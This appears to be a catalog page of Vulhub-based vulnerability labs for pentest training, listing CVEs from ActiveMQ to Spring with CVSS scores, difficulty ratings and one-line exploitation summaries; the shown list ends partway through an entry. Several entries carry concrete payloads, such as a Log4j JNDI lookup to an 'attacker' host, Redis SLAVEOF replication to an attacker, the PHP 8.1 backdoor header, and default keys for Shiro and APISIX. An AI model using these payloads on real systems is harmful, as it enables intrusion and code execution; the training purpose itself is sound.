π CVE Box
Curated Vulhub vulnerability catalog used to build OFFSEC corporate pentest challenges.
Apache ActiveMQ
CVE-2022-41678
activemq/CVE-2022-41678
CVSS 8.8
HARD
RCE
π
file
Authenticated Jolokia JMX bridge: POST crafted JSON to invoke ClassPathXmlApplicationContext with attacker-controlled URL for RCE.
Apache ActiveMQ
CVE-2023-46604
activemq/CVE-2023-46604
CVSS 10.0
EASY
RCE
π
file
Send ExceptionResponse OpenWire packet triggering ClassPathXmlApplicationContext with attacker URL. Loads Spring XML bean that executes OS command.
Apache Airflow
CVE-2020-11978
airflow/CVE-2020-11978
CVSS 8.8
MEDIUM
RCE
π
file
Authenticated Airflow user exploits command injection in DAG example to run arbitrary OS commands via the Airflow scheduler.
Apache Airflow
CVE-2020-11981
airflow/CVE-2020-11981
CVSS 9.8
MEDIUM
RCE
π
file
Exploit Airflow Celery executor arbitrary command execution via crafted task payload when the broker is accessible without auth.
AJ-Report
β
aj-report/CNVD-2024-15077
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated RCE in AJ-Report via crafted dataSetParam injection in the test interface that executes Groovy/JS code server-side.
Apache Druid
CVE-2021-25646
apache-druid/CVE-2021-25646
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated RCE via Apache Druid native query with embedded JavaScript or Groovy code when javascript.enabled=true.
Apereo CAS
β
apereo-cas/4.1-rce
CVSS 9.8
HARD
RCE
π
file
Exploit Java deserialization in Apereo CAS 4.1 via the login endpoint to execute gadget chain and run OS commands.
Apache APISIX
CVE-2020-13945
apisix/CVE-2020-13945
CVSS 8.8
MEDIUM
RCE
π
file
Exploit Apache APISIX default admin API key (edd1c9f034335f136f87ad84b625c8f1) to manage routes and inject malicious Lua code for RCE.
Apache APISIX
CVE-2021-45232
apisix/CVE-2021-45232
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated RCE via APISIX Dashboard API. Missing auth on /apisix/admin/routes allows creating route with malicious plugin executing OS commands.
Bash
CVE-2014-6271
bash/CVE-2014-6271
CVSS 10.0
EASY
RCE
π
file
Shellshock: inject OS commands in Bash environment variable values (e.g. User-Agent). CGI scripts pass HTTP headers as env vars, triggering execution.
Cacti
CVE-2022-46169
cacti/CVE-2022-46169
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated command injection in Cacti via X-Forwarded-For header in pollers.php. Inject OS command in the IP parameter processed by poller_item.
Cacti
CVE-2025-24367
cacti/CVE-2025-24367
CVSS 9.8
HARD
RCE
π
file
Authenticated RCE in Cacti via malicious package import that executes PHP code during the graph template import process.
Chartbrew
CVE-2026-25887
chartbrew/CVE-2026-25887
CVSS 9.8
MEDIUM
RCE
π
file
SSTI or command injection via Chartbrew dashboard template rendering when user-controlled data flows into server-side rendering engine.
CMS Made Simple
['CVE-2019-9053', 'CVE-2021-26120']
cmsms/CVE-2021-26120
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated SSTI in CMS Made Simple Smarty template engine via crafted URL parameter. Inject {system('cat /flag_proof')} in template context.
Adobe ColdFusion
CVE-2023-26360
coldfusion/CVE-2023-26360
CVSS 8.6
HARD
RCE
π
file
Unauthenticated path traversal + deserialization in ColdFusion 2021/2023. Reach restricted admin endpoint to trigger arbitrary Java deserialization.
Adobe ColdFusion
CVE-2023-29300
coldfusion/CVE-2023-29300
CVSS 9.8
INSANE
RCE
π
file
Exploit Java deserialization via ColdFusion WDDX endpoint. Send crafted serialized payload triggering gadget chain to execute OS commands as ColdFusion process.
ComfyUI
CVE-2025-67303
comfyui/CVE-2025-67303
CVSS 9.8
MEDIUM
RCE
π
file
Server-Side Template Injection or path traversal in ComfyUI workflow nodes allows reading arbitrary files or executing OS commands via crafted workflow JSON.
ComfyUI
CVE-2026-22777
comfyui/CVE-2026-22777
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated RCE in ComfyUI via malicious custom node or workflow that executes arbitrary Python code on the ComfyUI server.
Confluence
CVE-2019-3396
confluence/CVE-2019-3396
CVSS 9.8
MEDIUM
RCE
π
file
Path traversal in Widget Connector macro loads remote FreeMarker template. Inject SSTI payload or use SSRF to reach internal services.
Confluence
CVE-2021-26084
confluence/CVE-2021-26084
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated OGNL injection via setup wizard endpoint. Evaluates OGNL expression in URL parameter to execute arbitrary OS commands.
Confluence
CVE-2022-26134
confluence/CVE-2022-26134
CVSS 9.8
EASY
RCE
π
file
Inject OGNL in URI path without auth (e.g. /%24%[email protected]...%7D/). Direct OS command execution via Confluence OGNL evaluation.
Confluence
CVE-2023-22527
confluence/CVE-2023-22527
CVSS 10.0
HARD
RCE
π
file
Unauthenticated POST to Velocity template endpoint. Template injection payload in body executes OS commands without credentials.
Apache CouchDB
CVE-2017-12636
couchdb/CVE-2017-12636
CVSS 9.0
MEDIUM
RCE
π
file
Admin sets malicious OS command as query_server (PUT /_config/query_servers/cmd). Trigger via design document view using that server.
Apache CouchDB
CVE-2022-24706
couchdb/CVE-2022-24706
CVSS 10.0
EASY
RCE
π₯
db
Default Erlang cookie (monster) allows cluster join via epmd port. Execute arbitrary Erlang code as CouchDB process to read DB contents.
CraftCMS
CVE-2023-41892
craftcms/CVE-2023-41892
CVSS 10.0
HARD
RCE
π
file
Unauthenticated RCE in Craft CMS via SSTI in Twig template rendering when user input flows into templateString() without sanitization.
CraftCMS
CVE-2024-56145
craftcms/CVE-2024-56145
CVSS 9.8
HARD
RCE
π
file
PHP object injection in Craft CMS via unsafe unserialize() call. Craft gadget chain allows writing a PHP shell or executing OS commands.
CraftCMS
CVE-2025-32432
craftcms/CVE-2025-32432
CVSS 9.8
INSANE
RCE
π
file
Pre-auth RCE in Craft CMS 5.x via crafted request to template rendering endpoint that bypasses authentication and evaluates Twig expressions.
OpenPrinting Cups-Browsed
CVE-2024-47177
cups-browsed/CVE-2024-47177
CVSS 9.9
MEDIUM
RCE
π
file
Send crafted UDP packet to cups-browsed (port 631) with malicious PPD URL. cups-browsed fetches it and executes FoomaticRIPCommandLine for RCE.
Discuz!
β
discuz/wooyun-2010-080723
CVSS 7.5
MEDIUM
RCE
π
file
Discuz! arbitrary file deletion via crafted formhash parameter. Chain with cache poisoning to achieve PHP code execution.
Docker
β
docker/unauthorized-rce
CVSS 9.8
EASY
RCE
π
file
Unauthenticated Docker API (port 2375) exposed without TLS. Create privileged container mounting host filesystem to read /flag_proof from host.
Drupal
CVE-2017-6920
drupal/CVE-2017-6920
CVSS 9.8
HARD
RCE
π
file
YAML deserialization in Drupal 8 via unsafe use of Symfony YAML component. Craft PHP gadget chain in YAML to execute OS commands.
Drupal
CVE-2018-7600
drupal/CVE-2018-7600
CVSS 9.8
EASY
RCE
π
file
Exploit Form API #access callback bypass on user/register endpoint. Inject PHP via render array without authentication for direct command execution.
Drupal
CVE-2018-7602
drupal/CVE-2018-7602
CVSS 9.8
MEDIUM
RCE
π
file
Extension of Drupalgeddon2 (CVE-2018-7600) via destination parameter. Exploits same Form API flaw in authenticated or unauthenticated context.
Drupal
CVE-2019-6339
drupal/CVE-2019-6339
CVSS 9.8
HARD
RCE
π
file
PHAR deserialization via crafted image upload in Drupal. Upload PHAR-as-image, trigger deserialization via file processing to execute PHP gadget chain.
ElasticSearch
CVE-2014-3120
elasticsearch/CVE-2014-3120
CVSS 7.5
EASY
RCE
π
file
Elasticsearch dynamic scripting: POST /_search with MVEL script 'import java.io.*;new java.util.Scanner(Runtime.exec(cmd).getInputStream()).next()' executes OS commands.
ElasticSearch
CVE-2015-1427
elasticsearch/CVE-2015-1427
CVSS 10.0
MEDIUM
RCE
π
file
Groovy sandbox escape in Elasticsearch. Send search with script containing java.lang.Math.class.forName('java.lang.Runtime') to bypass sandbox and exec OS commands.
Electron
CVE-2018-1000006
electron/CVE-2018-1000006
CVSS 8.8
MEDIUM
RCE
π
file
Remote code execution in Electron app on Windows via custom URI scheme handler. Inject command via crafted URI that bypasses shell argument sanitization.
Electron
CVE-2018-15685
electron/CVE-2018-15685
CVSS 8.8
MEDIUM
RCE
π
file
Electron apps with contextIsolation disabled allow JavaScript from loaded web content to access Node.js APIs and execute OS commands.
elFinder
CVE-2021-32682
elfinder/CVE-2021-32682
CVSS 9.8
MEDIUM
RCE
π
file
elFinder PHP connector RCE via crafted archive extraction. Upload malicious archive that extracts to web-accessible path with PHP webshell.
Erlang/OTP SSH
CVE-2025-32433
erlang/CVE-2025-32433
CVSS 10.0
EASY
RCE
π
file
Unauthenticated RCE in Erlang/OTP SSH server. Send crafted SSH message before authentication to execute arbitrary OS commands on the server.
Fastjson
CVE-2017-18349
fastjson/1.2.24-rce
CVSS 9.8
MEDIUM
RCE
π
file
Send JSON with @type=com.sun.rowset.JdbcRowSetImpl and dataSourceName=ldap://attacker/a. fastjson instantiates class triggering JNDI lookup and remote class loading.
Fastjson
β
fastjson/1.2.47-rce
CVSS 9.8
HARD
RCE
π
file
Bypass fastjson 1.2.25+ blacklist using java.lang.Class to cache malicious class in loadClass. Then instantiate via JNDI to execute OS commands.
GeoServer
['CVE-2022-24816', 'CVE-2023-35042']
geoserver/CVE-2022-24816
CVSS 9.8
HARD
RCE
π
file
Eval injection in GeoServer JAI-EXT processing. Crafted raster processing expression executes arbitrary Java code on the server.
GeoServer
CVE-2024-36401
geoserver/CVE-2024-36401
CVSS 9.8
HARD
RCE
π
file
OGC filter treats property names as XPath/OGC expressions via GeoTools. Craft property name with exec() call for unauthenticated RCE.
Ghostscript
CVE-2018-16509
ghostscript/CVE-2018-16509
CVSS 9.8
EASY
RCE
π
file
Ghostscript -dSAFER bypass via crafted PostScript. Inject OS command in .ps file processed by Ghostscript via image conversion pipeline.
Ghostscript
CVE-2018-19475
ghostscript/CVE-2018-19475
CVSS 9.8
MEDIUM
RCE
π
file
Bypass Ghostscript sandbox via pdfwrite device parameters. Crafted PDF triggers arbitrary code execution during rendering.
Ghostscript
CVE-2019-6116
ghostscript/CVE-2019-6116
CVSS 9.8
MEDIUM
RCE
π
file
Ghostscript sandbox escape via subroutine in procedure params. Craft PostScript to bypass -dSAFER restrictions and execute OS commands.
Git
CVE-2017-8386
git/CVE-2017-8386
CVSS 8.8
MEDIUM
RCE
π
file
Exploit git-shell command restriction bypass. Send crafted repository name containing shell metacharacters to execute arbitrary commands on git server.
Gitea
β
gitea/1.4-rce
CVSS 8.8
MEDIUM
RCE
π
file
Exploit Gitea 1.4 Git hooks via repository admin. Set pre-receive/post-receive hook to arbitrary OS command executed on every git push.
GitLab
CVE-2021-22205
gitlab/CVE-2021-22205
CVSS 10.0
MEDIUM
RCE
π
file
Upload crafted DjVu image with malicious ExifTool metadata to GitLab upload endpoint. ExifTool processes it unauthenticated triggering command injection.
GitList
CVE-2018-1000533
gitlist/CVE-2018-1000533
CVSS 9.8
MEDIUM
RCE
π
file
Command injection in Gitlist via crafted git object name. The blame view passes user-controlled ref name to git command without proper escaping.
GoAhead
CVE-2017-17562
goahead/CVE-2017-17562
CVSS 8.1
MEDIUM
RCE
π
file
Exploit GoAhead CGI environment injection via malformed request. Inject environment variables like LD_PRELOAD to load malicious shared library and execute code.
GoAhead
CVE-2021-42342
goahead/CVE-2021-42342
CVSS 9.8
MEDIUM
RCE
π
file
RCE in GoAhead via crafted multipart request that injects environment variables when CGI is enabled. Shellshock-style attack via HTTP headers.
Grafana
CVE-2024-9264
grafana/CVE-2024-9264
CVSS 9.9
HARD
RCE
π
file
RCE in Grafana via plugin DuckDB backend. Craft SQL query using DuckDB read_text() or shell execution functions to read /flag_proof.
Springboot H2 Database
CVE-2018-10054
h2database/CVE-2018-10054
CVSS 8.8
MEDIUM
RCE
π
file
H2 database console allows ALIAS CREATE with Java code execution. CREATE ALIAS EXEC AS 'String exec(String cmd) throws Exception {Runtime.getRuntime().exec(cmd);}'; CALL EXEC('cmd').
Springboot H2 Database
CVE-2021-42392
h2database/CVE-2021-42392
CVSS 9.8
MEDIUM
RCE
π
file
JNDI injection in H2 database INIT script via JDBC URL. Craft jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT with JNDI lookup for RCE.
Springboot H2 Database
CVE-2022-23221
h2database/CVE-2022-23221
CVSS 9.8
EASY
RCE
π
file
Unauthenticated H2 console allows direct SQL execution. Execute CREATE ALIAS + CALL to run arbitrary Java/OS commands from the console.
Hadoop YARN
β
hadoop/unauthorized-yarn
CVSS 9.8
EASY
RCE
π
file
Submit application to YARN ResourceManager REST API (port 8088) without auth. Application executes OS command in new container reading /flag_proof.
Apache HertzBeat
CVE-2024-42323
hertzbeat/CVE-2024-42323
CVSS 9.8
MEDIUM
RCE
π
file
RCE in HertzBeat monitoring platform via unsafe Groovy script execution in custom monitoring templates accessible to authenticated users.
Apache HTTP Server
β
httpd/ssi-rce
CVSS 7.5
EASY
RCE
π
file
Upload .shtml file with SSI directive <!--#exec cmd='cat /flag_proof'-->. Apache mod_include executes command when serving the file.
Apache HugeGraph
CVE-2024-27348
hugegraph/CVE-2024-27348
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated RCE in Apache HugeGraph Server via Gremlin API endpoint. Execute Gremlin groovy expression containing Thread.currentThread().getContextClassLoader() for OS command execution.
ImageMagick
CVE-2016-3714
imagemagick/CVE-2016-3714
CVSS 8.4
EASY
RCE
π
file
ImageTragick: upload crafted MVG/SVG with 'url(https://|cmd)' directive. ImageMagick executes embedded shell command during image processing.
ImageMagick
CVE-2020-29599
imagemagick/CVE-2020-29599
CVSS 7.8
HARD
RCE
π
file
Inject shell commands in ImageMagick -authenticate parameter via crafted filename. Commands execute during image processing pipeline.
ingress-nginx
CVE-2025-1974
ingress-nginx/CVE-2025-1974
CVSS 9.8
INSANE
RCE
π
file
RCE in ingress-nginx controller via AdmissionWebhook. Craft malicious Ingress annotation containing nginx config injection that executes OS commands.
Jackson-Databind
CVE-2017-7525
jackson/CVE-2017-7525
CVSS 9.8
HARD
RCE
π
file
Jackson deserialization RCE via @type field. Send crafted JSON with com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl to execute OS commands.
Java RMI
β
java/rmi-codebase
CVSS 9.8
HARD
RCE
π
file
Java RMI remote class loading: connect to exposed RMI registry, invoke method that triggers codebase URL fetch. Server loads and executes remote class.
Java RMI
β
java/rmi-registry-bind-deserialization-bypass
CVSS 9.8
HARD
RCE
π
file
Bypass RMI registry bind restrictions (post-JDK8u141) using DGC (Distributed Garbage Collector) endpoint for unauthenticated deserialization RCE.
Java RMI
β
java/rmi-registry-bind-deserialization
CVSS 9.8
HARD
RCE
π
file
Java RMI registry deserialization: send crafted serialized object to RMI registry bind() call. Registry deserializes payload executing gadget chain.
JBoss
CVE-2017-12149
jboss/CVE-2017-12149
CVSS 9.8
MEDIUM
RCE
π
file
POST Java serialized Commons-Collections gadget to /invoker/JMXInvokerServlet. JBoss deserializes without auth executing OS commands.
JBoss
CVE-2017-7504
jboss/CVE-2017-7504
CVSS 9.8
MEDIUM
RCE
π
file
POST serialized Java payload to /invoker/JMXInvokerServlet (HTTP Invoker). JBoss EAP 4.x deserializes unauthenticated requests for RCE.
JBoss
β
jboss/JMXInvokerServlet-deserialization
CVSS 9.8
MEDIUM
RCE
π
file
Send HTTP POST with Java deserialization payload to JMXInvokerServlet or EJBInvokerServlet. Use Commons-Collections gadget chain for OS command execution.
Jenkins
CVE-2017-1000353
jenkins/CVE-2017-1000353
CVSS 9.8
HARD
RCE
π
file
Java deserialization in Jenkins CLI via crafted Java serialized object sent to TCP port 50000. Commons-Collections gadget chain executes OS commands.
Jenkins
CVE-2018-1000861
jenkins/CVE-2018-1000861
CVSS 9.8
HARD
RCE
π
file
Exploit Stapler routing to reach unauthenticated ClassPathResourceHandler. Chain with dynamic routing to access restricted endpoints and execute Groovy scripts.
JimuReport
CVE-2023-4450
jimureport/CVE-2023-4450
CVSS 9.8
EASY
RCE
π
file
Unauthenticated SSTI in JimuReport queryFieldBySql endpoint. Inject FreeMarker template expression that executes OS commands without authentication.
Apache Jmeter
CVE-2018-1297
jmeter/CVE-2018-1297
CVSS 9.8
EASY
RCE
π
file
Unauthenticated RCI in JMeter via exposed RMI registry (port 1099). Connect and invoke RCE via JMXConnector to execute arbitrary Java code.
Apache Kafka
CVE-2023-25194
kafka/CVE-2023-25194
CVSS 8.8
HARD
RCE
π
file
Authenticated Kafka Connect REST API allows JDBC connector with JNDI URL in connection string. Triggers JNDI lookup and remote class loading for RCE.
Kibana
CVE-2019-7609
kibana/CVE-2019-7609
CVSS 8.1
MEDIUM
RCE
π
file
Kibana Timelion prototype pollution via .es() expression. Pollute Object.prototype to execute OS commands when canvas renders the visualization.
Kibana
CVE-2020-7012
kibana/CVE-2020-7012
CVSS 7.2
MEDIUM
RCE
π
file
Kibana SSTI via Vega visualization spec. Craft Vega spec with arbitrary JavaScript in signal handlers that executes in Kibana server context.
kkFileView
β
kkfileview/4.3-zipslip-rce
CVSS 9.8
MEDIUM
RCE
π
file
Zip-slip vulnerability in kkFileView document preview server. Upload crafted ZIP with path traversal to overwrite web-accessible files and achieve RCE.
Langflow
CVE-2025-3248
langflow/CVE-2025-3248
CVSS 9.8
MEDIUM
RCE
π
file
Unauthenticated RCE in Langflow via /api/v1/run endpoint. Execute arbitrary Python code through crafted flow definition without authentication.
Laravel
CVE-2021-3129
laravel/CVE-2021-3129
CVSS 9.8
HARD
RCE
π
file
Laravel debug mode: exploit Ignition make-script to write Phar to log path. Trigger Phar deserialization via log manipulation for RCE.
Liferay Portal
CVE-2020-7961
liferay-portal/CVE-2020-7961
CVSS 9.8
HARD
RCE
π
file
Liferay Portal Java deserialization via /api/jsonws. POST crafted serialized payload invoking Commons-Collections gadget chain for unauthenticated RCE.
Laravel Livewire
CVE-2025-54068
livewire/CVE-2025-54068
CVSS 9.8
MEDIUM
RCE
π
file
File upload path traversal in Laravel Livewire. Upload component stores files at attacker-controlled path outside intended directory, enabling webshell placement.
Apache Log4j
CVE-2017-5645
log4j/CVE-2017-5645
CVSS 9.8
MEDIUM
RCE
π
file
Log4j 1.x SocketServer deserialization: connect to exposed port and send serialized Java payload. Commons-Collections gadget chain executes OS commands.
Apache Log4j
CVE-2021-44228
log4j/CVE-2021-44228
CVSS 10.0
MEDIUM
RCE
π
file
Inject ${jndi:ldap://attacker/a} in User-Agent or X-Api-Version header. Host rogue LDAP server returning class executing OS commands. Read /flag_proof after shell access.
Metabase
CVE-2023-38646
metabase/CVE-2023-38646
CVSS 9.8
HARD
RCE
π
file
Pre-auth RCE in Metabase via H2 database JDBC URL injection in setup endpoint. Craft JDBC URL with INIT script executing OS commands.
MeterSphere
β
metersphere/plugin-rce
CVSS 9.8
INSANE
RCE
π
file
MeterSphere plugin upload functionality allows arbitrary JAR execution. Upload malicious plugin with embedded RCE payload that reads /flag_proof on activation.
Mongo Express
CVE-2019-10758
mongo-express/CVE-2019-10758
CVSS 9.8
EASY
RCE
π
file
RCE in mongo-express via unsafe eval of BSON. Send crafted collection query with JavaScript payload to execute commands: {$where: 'return run("cat","/flag_proof")'}
Nacos
CVE-2021-29442
nacos/CVE-2021-29442
CVSS 7.5
MEDIUM
RCE
π₯
db
Nacos Derby SQL injection via the QoS endpoint. Inject SQL payload in GET /nacos/v1/cs/ops/derby?sql= to extract user credentials from internal Derby database.
Nexus Repository Manager
CVE-2019-7238
nexus/CVE-2019-7238
CVSS 9.8
MEDIUM
RCE
π
file
Sonatype Nexus Repository Manager RCE via Groovy script in REST API. POST crafted Groovy payload to /_api/rest/v1/script endpoint to execute OS commands.
Nexus Repository Manager
CVE-2020-10199
nexus/CVE-2020-10199
CVSS 9.8
MEDIUM
RCE
π
file
Nexus Repository Manager 3.x EL injection in asset upload API. Inject EL expressions in filename parameter to achieve RCE without authentication.
Nexus Repository Manager
CVE-2020-10204
nexus/CVE-2020-10204
CVSS 7.5
HARD
RCE
π
file
Nexus Repository Manager 3.x privilege escalation via role manipulation. Chain CSRF with authenticated session to elevate privileges and access admin functions.
node-postgres
CVE-2017-16082
node/CVE-2017-16082
CVSS 9.8
HARD
RCE
π
file
Remote code execution in node-postgres via prototype pollution. Inject malicious __proto__ properties in query parameters to achieve RCE in Node.js application.
Apache OFBiz
CVE-2020-9496
ofbiz/CVE-2020-9496
CVSS 9.8
HARD
RCE
π
file
Apache OFBiz XML-RPC deserialization RCE. Send crafted serialized Java object to /webtools/control/xmlrpc endpoint without authentication to execute OS commands.
Apache OFBiz
CVE-2023-51467
ofbiz/CVE-2023-51467
CVSS 9.8
EASY
RCE
π
file
Apache OFBiz authentication bypass via URL manipulation. Append USERNAME&PASSWORD&requirePasswordChange=Y to bypass login check and access admin functions.
Apache OFBiz
CVE-2024-38856
ofbiz/CVE-2024-38856
CVSS 9.8
MEDIUM
RCE
π
file
Apache OFBiz pre-auth RCE via view override parameter. Combine authentication bypass with ProgramExport to execute arbitrary Groovy code as unauthenticated user.
Apache OFBiz
CVE-2024-45195
ofbiz/CVE-2024-45195
CVSS 9.8
HARD
RCE
π
file
Apache OFBiz direct request bypass chained with SSTI. Exploit override view mechanism to inject server-side template expressions and achieve code execution.
Apache OFBiz
CVE-2024-45507
ofbiz/CVE-2024-45507
CVSS 9.8
INSANE
RCE
π
file
Apache OFBiz SSRF via ViewHandlerExt chained with internal service abuse. Pivot through internal network using SSRF to reach restricted management endpoints.
OpenSMTPD
CVE-2020-7247
opensmtpd/CVE-2020-7247
CVSS 10.0
MEDIUM
RCE
π
file
OpenSMTPD remote code execution via malicious MAIL FROM address. Send SMTP envelope with shell metacharacters in sender address to execute OS commands as root.
OpenTSDB
CVE-2020-35476
opentsdb/CVE-2020-35476
CVSS 9.8
HARD
RCE
π
file
OpenTSDB parameter injection via HTTP API allows command execution. Inject shell metacharacters in gnuplot parameters via metric query to execute OS commands.
OpenTSDB
CVE-2023-25826
opentsdb/CVE-2023-25826
CVSS 9.8
HARD
RCE
π
file
OpenTSDB SSRF and RCE via telnet API endpoint. Connect to telnet interface, inject HTTP parameter in metric name to execute gnuplot commands and read files.
PDF.js
CVE-2024-4367
pdfjs/CVE-2024-4367
CVSS 8.8
HARD
RCE
π
file
PDF.js arbitrary JavaScript execution via malicious PDF font name. Serve crafted PDF that executes JS when rendered in browser, triggering XSS to exfiltrate session cookies.
pgAdmin
CVE-2022-4223
pgadmin/CVE-2022-4223
CVSS 9.8
MEDIUM
RCE
π
file
pgAdmin 4 path traversal allows reading files outside web root. Exploit directory traversal in the file manager to access /flag_proof on the server.
pgAdmin
CVE-2023-5002
pgadmin/CVE-2023-5002
CVSS 8.8
MEDIUM
RCE
π
file
pgAdmin 4 open redirect and CSRF token bypass. Chain open redirect with CSRF to perform admin actions without authorization and read sensitive configuration.
pgAdmin
CVE-2025-2945
pgadmin/CVE-2025-2945
CVSS 9.8
INSANE
RCE
π
file
pgAdmin 4 remote code execution via query tool. Abuse COPY TO/FROM PROGRAM PostgreSQL feature through pgAdmin interface to execute OS commands.
pgAdmin
CVE-2025-13780
pgadmin/CVE-2025-13780
CVSS 9.8
HARD
RCE
π
file
pgAdmin 4 MFA bypass via session fixation. Manipulate session state to skip multi-factor authentication and access admin panel directly.
PHP
β
php/8.1-backdoor
CVSS 9.8
EASY
RCE
π
file
PHP 8.1.0-dev backdoor via User-Agentt header. Send HTTP request with User-Agentt: zerodiumsystem('cat /flag_proof'); to execute arbitrary PHP code.
PHP-CGI
CVE-2012-1823
php/CVE-2012-1823
CVSS 9.8
MEDIUM
RCE
π
file
PHP CGI argument injection allows remote code execution. Append ?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input to URL with PHP payload in body.
PHP-IMAP
CVE-2018-19518
php/CVE-2018-19518
CVSS 9.8
HARD
RCE
π
file
PHP imap_open SSRF/RCE via imap_open() with mailbox argument injection. Inject shell metacharacters in imap server parameter to execute OS commands via sendmail.
PHP-FPM
CVE-2019-11043
php/CVE-2019-11043
CVSS 9.8
MEDIUM
RCE
π
file
PHP-FPM buffer underflow RCE via nginx fastcgi_split_path_info regex. Send path with newline character to corrupt FPM memory and execute arbitrary code.
PHP
CVE-2024-2961
php/CVE-2024-2961
CVSS 9.8
HARD
RCE
π
file
PHP iconv buffer overflow via crafted string conversion. Exploit heap overflow in iconv to achieve RCE through carefully crafted input to conversion functions.
PHP-FPM
β
php/fpm
CVSS 9.8
MEDIUM
RCE
π
file
PHP-FPM misconfiguration exposes port 9000 directly. Use Fastcgi protocol client to send requests directly to PHP-FPM, bypassing nginx access controls.
PHP
β
php/inclusion
CVSS 7.5
EASY
RCE
π
file
PHP Local File Inclusion via unvalidated include path parameter. Use ?page=../../../../flag_proof or PHP filter wrappers like php://filter/read to include flag file.
PHP
β
php/xdebug-rce
CVSS 9.8
EASY
RCE
π
file
PHP Xdebug remote execution via exposed debug port 9000. Connect to Xdebug protocol, set breakpoint, and eval PHP code to read /flag_proof file.
phpMyAdmin
CVE-2016-5734
phpmyadmin/CVE-2016-5734
CVSS 9.8
MEDIUM
RCE
π
file
phpMyAdmin RCE via preg_replace /e modifier in older PHP. Exploit SQL query with crafted regex replacement to execute PHP code through database query.
PHPUnit
CVE-2017-9841
phpunit/CVE-2017-9841
CVSS 9.8
EASY
RCE
π
file
PHPUnit remote code execution via eval-stdin.php utility exposed in vendor directory. POST PHP code to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php for instant RCE.
PostgreSQL
CVE-2019-9193
postgres/CVE-2019-9193
CVSS 9.8
MEDIUM
RCE
π
file
PostgreSQL COPY TO/FROM PROGRAM command execution. Use COPY (SELECT '') TO PROGRAM 'cat /flag_proof > /tmp/out' to execute OS commands via superuser SQL.
Python
CVE-2017-8291
python/PIL-CVE-2017-8291
CVSS 7.8
HARD
RCE
π
file
Pillow ghostscript command injection via EPS file processing. Upload crafted EPS image that injects shell commands through ghostscript interpreter during processing.
Python
CVE-2018-16509
python/PIL-CVE-2018-16509
CVSS 9.8
HARD
RCE
π
file
Pillow ImageMagick command injection via PDF processing. Upload crafted PDF that exploits ghostscript MVSave vulnerability to execute OS commands.
Python
β
python/unpickle
CVSS 9.8
EASY
RCE
π
file
Python pickle deserialization RCE. Craft malicious pickle object using __reduce__ to execute OS commands: encode os.system('cat /flag_proof') in pickle payload.
React
CVE-2025-55182
react/CVE-2025-55182
CVSS 9.8
INSANE
RCE
π
file
React Server Components arbitrary file read via improper sanitization of server action imports. Craft malicious import path to read /flag_proof from server filesystem.
Redis
β
redis/4-unacc
CVSS 9.8
EASY
RCE
π
file
Redis unauthenticated access on port 6379. Connect directly: redis-cli -h target SLAVEOF attacker 6379, then use replication to write SSH key or cron for RCE.
Redis
CVE-2022-0543
redis/CVE-2022-0543
CVSS 10.0
MEDIUM
RCE
π
file
Redis Lua sandbox escape via package.loadlib. Execute eval 'return package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so","luaopen_io")()' to achieve RCE.
Apache RocketMQ
CVE-2023-33246
rocketmq/CVE-2023-33246
CVSS 9.8
MEDIUM
RCE
π
file
Apache RocketMQ RCE via NameServer configuration update command. Send crafted update config request to port 9876 to execute OS commands through broker config injection.
Ruby
CVE-2017-17405
ruby/CVE-2017-17405
CVSS 9.8
MEDIUM
RCE
π
file
Ruby Net::FTP command injection via crafted FTP server response. Exploit PASV response parsing to inject OS commands through FTP client library.
SaltStack
CVE-2020-16846
saltstack/CVE-2020-16846
CVSS 9.8
MEDIUM
RCE
π
file
SaltStack shell injection via salt-api netapi. Send crafted request to /run endpoint with eauth=auto and shell metacharacters in client parameter to execute OS commands.
Samba
CVE-2017-7494
samba/CVE-2017-7494
CVSS 10.0
MEDIUM
RCE
π
file
SambaCry: RCE in Samba writable share via shared library injection. Upload .so file to writable share, trigger load via IPC$ to execute arbitrary code (EternalRed).
Apache Shiro
CVE-2016-4437
shiro/CVE-2016-4437
CVSS 9.8
MEDIUM
RCE
π
file
Apache Shiro RememberMe cookie deserialization RCE. Encrypt malicious Java serialized payload with default AES key kPH+bIxk5D2deZiIxcaaaA== and send as rememberMe cookie.
ShowDoc
β
showdoc/CNVD-2020-26585
CVSS 9.8
MEDIUM
RCE
π
file
ShowDoc arbitrary file upload via CKEditor image upload endpoint. Upload PHP webshell disguised as image to /public/uploads/ directory and execute commands.
Apache Solr
CVE-2017-12629
solr/CVE-2017-12629-RCE
CVSS 9.8
MEDIUM
RCE
π
file
Apache Solr XXE+SSRF leading to RCE via RunExecutableListener. Enable listener via Config API then trigger via query to execute OS commands on Solr server.
Apache Solr
CVE-2019-0193
solr/CVE-2019-0193
CVSS 9.8
MEDIUM
RCE
π
file
Apache Solr DataImportHandler RCE via script transformer. POST malicious Groovy script in DIH config to execute OS commands during data import.
Apache Solr
CVE-2019-17558
solr/CVE-2019-17558
CVSS 9.8
HARD
RCE
π
file
Apache Solr Velocity template injection via Params ResourceLoader. Enable params.resource.loader.enabled then inject Velocity template in qt parameter for RCE.
Apache Spark
β
spark/unacc
CVSS 9.8
EASY
RCE
π
file
Apache Spark unauthenticated REST API access. Submit malicious Spark job via POST /api/v1/applications or access master UI on port 8080 to execute code via job submission.
Spring Security Oauth2
CVE-2016-4977
spring/CVE-2016-4977
CVSS 9.8
MEDIUM
RCE
π
file
Spring Security OAuth2 RCE via SpEL injection in error response. Craft malicious authorization request with SpEL expression in scope parameter for code execution.
Spring Webflow
CVE-2017-4971
spring/CVE-2017-4971
CVSS 8.8
HARD
RCE
π
file
Spring Web Flow RCE via EL injection in flow definition expressions. Inject SpEL expressions via form field binding to execute arbitrary Java code.
Spring Data Rest
CVE-2017-8046
spring/CVE-2017-8046
CVSS 9.8
EASY
RCE
π
file
Spring Data REST RCE via PATCH request with JSON Merge Patch. Send PATCH with T(java.lang.Runtime).getRuntime().exec() in path expression for RCE.
Spring Messaging
CVE-2018-1270
